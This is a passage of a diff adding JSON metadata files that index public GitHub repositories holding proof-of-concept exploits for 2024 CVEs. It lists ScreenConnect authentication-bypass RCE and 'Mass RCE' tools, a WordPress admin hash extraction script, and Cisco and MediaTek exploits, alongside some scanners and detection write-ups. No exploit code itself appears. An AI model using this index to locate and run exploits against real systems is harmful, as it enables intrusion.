"https:\/\/github.com\/sharpicx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sharpicx\/CVE-2024-1651-PoC", + "description": "Torrentpier v2.4.1. CVE-2024-1651. Remote Code Execution (RCE). Exploit.", + "fork": false, + "created_at": "2024-02-23T11:04:24Z", + "updated_at": "2024-11-20T16:30:40Z", + "pushed_at": "2024-03-07T10:23:52Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "rce", + "security", + "torrentpier" + ], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 765380419, + "name": "CVE-2024-1651-exploit-RCE", + "full_name": "hy011121\/CVE-2024-1651-exploit-RCE", + "owner": { + "login": "hy011121", + "id": 75035965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75035965?v=4", + "html_url": "https:\/\/github.com\/hy011121", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hy011121\/CVE-2024-1651-exploit-RCE", + "description": "(Mirorring)", + "fork": false, + "created_at": "2024-02-29T20:06:30Z", + "updated_at": "2024-05-31T16:53:29Z", + "pushed_at": "2024-02-29T21:09:19Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789059612, + "name": "CVE-2024-1651-PoC", + "full_name": "Whiteh4tWolf\/CVE-2024-1651-PoC", + "owner": { + "login": "Whiteh4tWolf", + "id": 53398803, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53398803?v=4", + "html_url": "https:\/\/github.com\/Whiteh4tWolf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Whiteh4tWolf\/CVE-2024-1651-PoC", + "description": null, + "fork": false, + "created_at": "2024-04-19T16:18:59Z", + "updated_at": "2024-04-19T16:20:44Z", + "pushed_at": "2024-04-19T16:20:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1655.json b/2024/CVE-2024-1655.json new file mode 100644 index 0000000000..2dd8106d6b --- /dev/null +++ b/2024/CVE-2024-1655.json @@ -0,0 +1,33 @@ +[ + { + "id": 796642361, + "name": "CVE-2024-1655", + "full_name": "lnversed\/CVE-2024-1655", + "owner": { + "login": "lnversed", + "id": 46649884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46649884?v=4", + "html_url": "https:\/\/github.com\/lnversed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lnversed\/CVE-2024-1655", + "description": null, + "fork": false, + "created_at": "2024-05-06T10:56:47Z", + "updated_at": "2024-05-06T10:57:22Z", + "pushed_at": "2024-05-06T10:57:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1698.json b/2024/CVE-2024-1698.json new file mode 100644 index 0000000000..ad42f405ad --- /dev/null +++ b/2024/CVE-2024-1698.json @@ -0,0 +1,95 @@ +[ + { + "id": 779111890, + "name": "CVE-2024-1698-Exploit", + "full_name": "kamranhasan\/CVE-2024-1698-Exploit", + "owner": { + "login": "kamranhasan", + "id": 53407467, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53407467?v=4", + "html_url": "https:\/\/github.com\/kamranhasan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kamranhasan\/CVE-2024-1698-Exploit", + "description": "This is an exploit script to find out wordpress admin's username and password hash by exploiting CVE-2024-1698.", + "fork": false, + "created_at": "2024-03-29T04:11:06Z", + "updated_at": "2024-12-06T09:40:39Z", + "pushed_at": "2024-03-29T04:31:31Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 872446949, + "name": "CVE-2024-1698", + "full_name": "shanglyu\/CVE-2024-1698", + "owner": { + "login": "shanglyu", + "id": 62023200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62023200?v=4", + "html_url": "https:\/\/github.com\/shanglyu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shanglyu\/CVE-2024-1698", + "description": null, + "fork": false, + "created_at": "2024-10-14T13:02:26Z", + "updated_at": "2024-10-14T13:09:39Z", + "pushed_at": "2024-10-14T13:09:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 889535406, + "name": "WordPress-NotificationX-CVE-2024-1698", + "full_name": "jesicatjan\/WordPress-NotificationX-CVE-2024-1698", + "owner": { + "login": "jesicatjan", + "id": 122602674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122602674?v=4", + "html_url": "https:\/\/github.com\/jesicatjan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jesicatjan\/WordPress-NotificationX-CVE-2024-1698", + "description": null, + "fork": false, + "created_at": "2024-11-16T15:21:24Z", + "updated_at": "2024-11-20T03:35:53Z", + "pushed_at": "2024-11-19T05:06:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1709.json b/2024/CVE-2024-1709.json new file mode 100644 index 0000000000..3e11c61bc9 --- /dev/null +++ b/2024/CVE-2024-1709.json @@ -0,0 +1,197 @@ +[ + { + "id": 761127845, + "name": "ScreenConnect-AuthBypass-RCE", + "full_name": "W01fh4cker\/ScreenConnect-AuthBypass-RCE", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/ScreenConnect-AuthBypass-RCE", + "description": "ScreenConnect AuthBypass(cve-2024-1709) --> RCE!!!", + "fork": false, + "created_at": "2024-02-21T09:42:04Z", + "updated_at": "2024-11-21T14:01:57Z", + "pushed_at": "2024-07-16T09:26:55Z", + "stargazers_count": 94, + "watchers_count": 94, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "attack", + "auth", + "bypass", + "connectwise", + "cve-2024-1708", + "cve-2024-1709", + "redteam", + "screenconnect" + ], + "visibility": "public", + "forks": 26, + "watchers": 94, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 762393021, + "name": "CVE-2024-1709", + "full_name": "HussainFathy\/CVE-2024-1709", + "owner": { + "login": "HussainFathy", + "id": 76268960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76268960?v=4", + "html_url": "https:\/\/github.com\/HussainFathy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HussainFathy\/CVE-2024-1709", + "description": "A Scanner for CVE-2024-1709 - ConnectWise SecureConnect Authentication Bypass Vulnerability", + "fork": false, + "created_at": "2024-02-23T17:26:28Z", + "updated_at": "2024-04-02T03:28:07Z", + "pushed_at": "2024-02-26T12:00:23Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 776185551, + "name": "CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass", + "full_name": "sxyrxyy\/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass", + "owner": { + "login": "sxyrxyy", + "id": 125439203, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125439203?v=4", + "html_url": "https:\/\/github.com\/sxyrxyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sxyrxyy\/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass", + "description": null, + "fork": false, + "created_at": "2024-03-22T21:20:19Z", + "updated_at": "2024-03-22T21:20:44Z", + "pushed_at": "2024-03-22T21:32:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780750161, + "name": "CVE-2024-1709-and-CVE-2024-1708", + "full_name": "cjybao\/CVE-2024-1709-and-CVE-2024-1708", + "owner": { + "login": "cjybao", + "id": 61445855, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61445855?v=4", + "html_url": "https:\/\/github.com\/cjybao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cjybao\/CVE-2024-1709-and-CVE-2024-1708", + "description": null, + "fork": false, + "created_at": "2024-04-02T04:58:38Z", + "updated_at": "2024-04-03T03:43:48Z", + "pushed_at": "2024-04-02T07:58:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 856582109, + "name": "Event-ID-229-Rule-Name-SOC262-CVE-2024-1709-", + "full_name": "AhmedMansour93\/Event-ID-229-Rule-Name-SOC262-CVE-2024-1709-", + "owner": { + "login": "AhmedMansour93", + "id": 179945455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179945455?v=4", + "html_url": "https:\/\/github.com\/AhmedMansour93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AhmedMansour93\/Event-ID-229-Rule-Name-SOC262-CVE-2024-1709-", + "description": "Event ID 229 Rule Name SOC262 ScreenConnect Authentication Bypass Exploitation Detected (CVE-2024-1709)", + "fork": false, + "created_at": "2024-09-12T20:31:19Z", + "updated_at": "2024-09-12T20:31:52Z", + "pushed_at": "2024-09-12T20:31:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 873464505, + "name": "Mass-CVE-2024-1709", + "full_name": "AMRICHASFUCK\/Mass-CVE-2024-1709", + "owner": { + "login": "AMRICHASFUCK", + "id": 92443330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92443330?v=4", + "html_url": "https:\/\/github.com\/AMRICHASFUCK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AMRICHASFUCK\/Mass-CVE-2024-1709", + "description": "ScreenConnect AuthBypass Mass RCE", + "fork": false, + "created_at": "2024-10-16T08:05:35Z", + "updated_at": "2024-10-18T16:53:30Z", + "pushed_at": "2024-10-16T08:38:05Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1781.json b/2024/CVE-2024-1781.json new file mode 100644 index 0000000000..b0c6cc4036 --- /dev/null +++ b/2024/CVE-2024-1781.json @@ -0,0 +1,33 @@ +[ + { + "id": 756338567, + "name": "CVE-2024-1781", + "full_name": "Icycu123\/CVE-2024-1781", + "owner": { + "login": "Icycu123", + "id": 89123126, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89123126?v=4", + "html_url": "https:\/\/github.com\/Icycu123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Icycu123\/CVE-2024-1781", + "description": "CVE-2024-1781", + "fork": false, + "created_at": "2024-02-12T13:26:03Z", + "updated_at": "2024-03-14T12:34:11Z", + "pushed_at": "2024-02-12T13:54:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1874.json b/2024/CVE-2024-1874.json new file mode 100644 index 0000000000..1e28fa4342 --- /dev/null +++ b/2024/CVE-2024-1874.json @@ -0,0 +1,64 @@ +[ + { + "id": 787746052, + "name": "-CVE-2024-1874-", + "full_name": "ox1111\/-CVE-2024-1874-", + "owner": { + "login": "ox1111", + "id": 31942498, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31942498?v=4", + "html_url": "https:\/\/github.com\/ox1111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ox1111\/-CVE-2024-1874-", + "description": "command injection", + "fork": false, + "created_at": "2024-04-17T05:26:34Z", + "updated_at": "2024-04-17T05:26:34Z", + "pushed_at": "2024-04-17T05:26:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 830599691, + "name": "CVE-2024-1874", + "full_name": "Tgcohce\/CVE-2024-1874", + "owner": { + "login": "Tgcohce", + "id": 91344858, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91344858?v=4", + "html_url": "https:\/\/github.com\/Tgcohce", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tgcohce\/CVE-2024-1874", + "description": "Proof Of Concept for CVE-2024-1874", + "fork": false, + "created_at": "2024-07-18T15:25:17Z", + "updated_at": "2024-09-19T18:30:06Z", + "pushed_at": "2024-09-19T18:30:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1931.json b/2024/CVE-2024-1931.json new file mode 100644 index 0000000000..d47aaa0f8a --- /dev/null +++ b/2024/CVE-2024-1931.json @@ -0,0 +1,33 @@ +[ + { + "id": 842021663, + "name": "CVE-2024-1931-reproduction", + "full_name": "passer12\/CVE-2024-1931-reproduction", + "owner": { + "login": "passer12", + "id": 93042040, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93042040?v=4", + "html_url": "https:\/\/github.com\/passer12", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/passer12\/CVE-2024-1931-reproduction", + "description": "CVE-2024-1931-reproduction", + "fork": false, + "created_at": "2024-08-13T14:09:20Z", + "updated_at": "2024-08-13T14:10:30Z", + "pushed_at": "2024-08-13T14:10:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1939.json b/2024/CVE-2024-1939.json new file mode 100644 index 0000000000..cd0b056de3 --- /dev/null +++ b/2024/CVE-2024-1939.json @@ -0,0 +1,33 @@ +[ + { + "id": 847292131, + "name": "CVE-2024-1939", + "full_name": "rycbar77\/CVE-2024-1939", + "owner": { + "login": "rycbar77", + "id": 35279858, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35279858?v=4", + "html_url": "https:\/\/github.com\/rycbar77", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rycbar77\/CVE-2024-1939", + "description": "For V8CTF M122", + "fork": false, + "created_at": "2024-08-25T12:08:54Z", + "updated_at": "2024-12-19T20:53:55Z", + "pushed_at": "2024-08-25T12:42:14Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20017.json b/2024/CVE-2024-20017.json new file mode 100644 index 0000000000..82c1ff266b --- /dev/null +++ b/2024/CVE-2024-20017.json @@ -0,0 +1,33 @@ +[ + { + "id": 849722373, + "name": "cve-2024-20017", + "full_name": "mellow-hype\/cve-2024-20017", + "owner": { + "login": "mellow-hype", + "id": 25216562, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25216562?v=4", + "html_url": "https:\/\/github.com\/mellow-hype", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mellow-hype\/cve-2024-20017", + "description": "exploits for CVE-2024-20017", + "fork": false, + "created_at": "2024-08-30T05:54:36Z", + "updated_at": "2024-12-30T02:37:38Z", + "pushed_at": "2024-09-07T10:11:22Z", + "stargazers_count": 138, + "watchers_count": 138, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 32, + "watchers": 138, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20137.json b/2024/CVE-2024-20137.json new file mode 100644 index 0000000000..0d848ffff4 --- /dev/null +++ b/2024/CVE-2024-20137.json @@ -0,0 +1,33 @@ +[ + { + "id": 908244562, + "name": "CVE-2024-20137", + "full_name": "takistmr\/CVE-2024-20137", + "owner": { + "login": "takistmr", + "id": 30937876, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30937876?v=4", + "html_url": "https:\/\/github.com\/takistmr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/takistmr\/CVE-2024-20137", + "description": "Python code for expoiting of vulnerability in wlan driver of MediaTek SOCs MT6890, MT7622, MT7915, MT7916, MT7981, MT7986", + "fork": false, + "created_at": "2024-12-25T15:01:38Z", + "updated_at": "2024-12-28T16:47:15Z", + "pushed_at": "2024-12-25T16:57:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20291.json b/2024/CVE-2024-20291.json new file mode 100644 index 0000000000..5415a9f620 --- /dev/null +++ b/2024/CVE-2024-20291.json @@ -0,0 +1,33 @@ +[ + { + "id": 766433376, + "name": "CVE-2024-20291-POC", + "full_name": "Instructor-Team8\/CVE-2024-20291-POC", + "owner": { + "login": "Instructor-Team8", + "id": 61094918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61094918?v=4", + "html_url": "https:\/\/github.com\/Instructor-Team8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Instructor-Team8\/CVE-2024-20291-POC", + "description": "CVE-2024-20291-POC exploit ---> RCE", + "fork": false, + "created_at": "2024-03-03T08:53:14Z", + "updated_at": "2024-04-26T15:34:10Z", + "pushed_at": "2024-03-09T18:14:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20338.json b/2024/CVE-2024-20338.json new file mode 100644 index 0000000000..e2ff436e34 --- /dev/null +++ b/2024/CVE-2024-20338.json @@ -0,0 +1,33 @@ +[ + { + "id": 813167804, + "name": "CVE-2024-20338", + "full_name": "annmuor\/CVE-2024-20338", + "owner": { + "login": "annmuor", + "id": 1037402, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1037402?v=4", + "html_url": "https:\/\/github.com\/annmuor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/annmuor\/CVE-2024-20338", + "description": "CVE-2024-20338 talk for Behind The Code Talk", + "fork": false, + "created_at": "2024-06-10T15:41:41Z", + "updated_at": "2024-06-20T16:27:44Z", + "pushed_at": "2024-06-10T20:13:25Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20356.json b/2024/CVE-2024-20356.json new file mode 100644 index 0000000000..085e7c46ea --- /dev/null +++ b/2024/CVE-2024-20356.json @@ -0,0 +1,68 @@ +[ + { + "id": 785760205, + "name": "CVE-2024-20356", + "full_name": "nettitude\/CVE-2024-20356", + "owner": { + "login": "nettitude", + "id": 11998401, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11998401?v=4", + "html_url": "https:\/\/github.com\/nettitude", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nettitude\/CVE-2024-20356", + "description": "This is a proof of concept for CVE-2024-20356, a Command Injection vulnerability in Cisco's CIMC.", + "fork": false, + "created_at": "2024-04-12T15:07:42Z", + "updated_at": "2024-12-28T12:57:02Z", + "pushed_at": "2024-04-18T14:31:34Z", + "stargazers_count": 55, + "watchers_count": 55, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cimc", + "cisco", + "cve-2024-20356" + ], + "visibility": "public", + "forks": 11, + "watchers": 55, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 803051557, + "name": "CVE_2024_20356", + "full_name": "SherllyNeo\/CVE_2024_20356", + "owner": { + "login": "SherllyNeo", + "id": 104321419, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104321419?v=4", + "html_url": "https:\/\/github.com\/SherllyNeo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SherllyNeo\/CVE_2024_20356", + "description": "A oxidized version of https:\/\/github.com\/nettitude\/CVE-2024-20356\/blob\/main\/CVE-2024-20356.py", + "fork": false, + "created_at": "2024-05-20T00:57:01Z", + "updated_at": "2024-05-30T15:05:41Z", + "pushed_at": "2024-05-27T17:54:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20404.json b/2024/CVE-2024-20404.json new file mode 100644 index 0000000000..10207436f7 --- /dev/null +++ b/2024/CVE-2024-20404.json @@ -0,0 +1,33 @@ +[ + { + "id": 812743717, + "name": "CVE-2024-20404", + "full_name": "AbdElRahmanEzzat1995\/CVE-2024-20404", + "owner": { + "login": "AbdElRahmanEzzat1995", + "id": 67908228, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67908228?v=4", + "html_url": "https:\/\/github.com\/AbdElRahmanEzzat1995", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AbdElRahmanEzzat1995\/CVE-2024-20404", + "description": null, + "fork": false, + "created_at": "2024-06-09T18:50:59Z", + "updated_at": "2024-12-05T09:44:44Z", + "pushed_at": "2024-06-09T18:51:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20405.json b/2024/CVE-2024-20405.json new file mode 100644 index 0000000000..73102912c6 --- /dev/null +++ b/2024/CVE-2024-20405.json @@ -0,0 +1,33 @@ +[ + { + "id": 812744797, + "name": "CVE-2024-20405", + "full_name": "AbdElRahmanEzzat1995\/CVE-2024-20405", + "owner": { + "login": "AbdElRahmanEzzat1995", + "id": 67908228, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67908228?v=4", + "html_url": "https:\/\/github.com\/AbdElRahmanEzzat1995", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AbdElRahmanEzzat1995\/CVE-2024-20405", + "description": null, + "fork": false, + "created_at": "2024-06-09T18:55:03Z", + "updated_at": "2024-06-11T01:50:57Z", + "pushed_at": "2024-06-09T18:55:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20467.json b/2024/CVE-2024-20467.json new file mode 100644 index 0000000000..53047b6fa8 --- /dev/null +++ b/2024/CVE-2024-20467.json @@ -0,0 +1,33 @@ +[ + { + "id": 864676343, + "name": "PoC-Exploit-CVE-2024-20467", + "full_name": "saler-cve\/PoC-Exploit-CVE-2024-20467", + "owner": { + "login": "saler-cve", + "id": 182943844, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/182943844?v=4", + "html_url": "https:\/\/github.com\/saler-cve", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/saler-cve\/PoC-Exploit-CVE-2024-20467", + "description": null, + "fork": false, + "created_at": "2024-09-28T21:23:00Z", + "updated_at": "2024-09-28T21:23:38Z", + "pushed_at": "2024-09-28T21:23:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2054.json b/2024/CVE-2024-2054.json new file mode 100644 index 0000000000..13f3015fdd --- /dev/null +++ b/2024/CVE-2024-2054.json @@ -0,0 +1,33 @@ +[ + { + "id": 777085087, + "name": "CVE-2024-2054", + "full_name": "Madan301\/CVE-2024-2054", + "owner": { + "login": "Madan301", + "id": 111639304, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111639304?v=4", + "html_url": "https:\/\/github.com\/Madan301", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Madan301\/CVE-2024-2054", + "description": null, + "fork": false, + "created_at": "2024-03-25T07:01:59Z", + "updated_at": "2024-03-26T05:40:44Z", + "pushed_at": "2024-03-26T18:33:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20656.json b/2024/CVE-2024-20656.json new file mode 100644 index 0000000000..06bf9b8554 --- /dev/null +++ b/2024/CVE-2024-20656.json @@ -0,0 +1,33 @@ +[ + { + "id": 742476162, + "name": "CVE-2024-20656", + "full_name": "Wh04m1001\/CVE-2024-20656", + "owner": { + "login": "Wh04m1001", + "id": 44291883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291883?v=4", + "html_url": "https:\/\/github.com\/Wh04m1001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wh04m1001\/CVE-2024-20656", + "description": null, + "fork": false, + "created_at": "2024-01-12T15:08:01Z", + "updated_at": "2024-12-26T18:51:04Z", + "pushed_at": "2024-01-14T07:14:33Z", + "stargazers_count": 138, + "watchers_count": 138, + "has_discussions": false, + "forks_count": 30, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 30, + "watchers": 138, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-20666.json b/2024/CVE-2024-20666.json new file mode 100644 index 0000000000..553d6f81c8 --- /dev/null +++ b/2024/CVE-2024-20666.json @@ -0,0 +1,70 @@ +[ + { + "id": 758035634, + "name": "Script-For-CVE-2024-20666", + "full_name": "nnotwen\/Script-For-CVE-2024-20666", + "owner": { + "login": "nnotwen", + "id": 112250334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112250334?v=4", + "html_url": "https:\/\/github.com\/nnotwen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nnotwen\/Script-For-CVE-2024-20666", + "description": " PowerShell script that can help you automate updating the Windows Recovery Environment (WinRE) on deployed devices to address the security vulnerabilities in CVE-2024-20666.", + "fork": false, + "created_at": "2024-02-15T13:53:21Z", + "updated_at": 